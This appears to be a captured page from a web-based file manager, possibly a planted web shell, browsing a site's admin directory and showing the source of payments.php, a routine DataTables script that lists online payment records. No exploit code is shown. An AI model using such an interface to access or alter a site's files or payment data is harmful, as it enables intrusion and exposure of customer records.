[ Root System Explorer ]
Location:
Root
/
var
/
www
/
html
/
acma.in
/
new-cp-admin
/
paginations
+ Folder
+ File
Upload
Editing: payments.php
<?php include 'SSP.php'; $table = 'online_payment'; // Table's primary key $primaryKey = 'id'; // Array of database columns which should be read and sent back to DataTables. // The `db` parameter represents the column name in the database, while the `dt` // parameter represents the DataTables column identifier. In this case simple // indexes $columns = array( array( 'db' => 'id', 'dt' => 0, 'formatter' => function( $d, $row ) { return $d; } ), array( 'db' => 'billing_name', 'dt' => 1 ), array( 'db' => 'company_name', 'dt' => 2 ), array( 'db' => 'event_name', 'dt' => 3 ), array( 'db' => 'amount', 'dt' => 4 ), array( 'db' => 'order_id', 'dt' => 5 ), array( 'db' => 'formname', 'dt' => 6 ), array( 'db' => 'responce_gateway', 'dt' => 7 ), ); echo json_encode( SSP::simple( $_GET, $sql_details, $table, $primaryKey, $columns ) ); ?>
SAVE CHANGES
[ CANCEL ]
Name
Type
Actions
.. (Parent Directory)
📄 SSP.php
FILE
Ren
[EDIT]
DEL
📄 payments.php
FILE
Ren
[EDIT]
DEL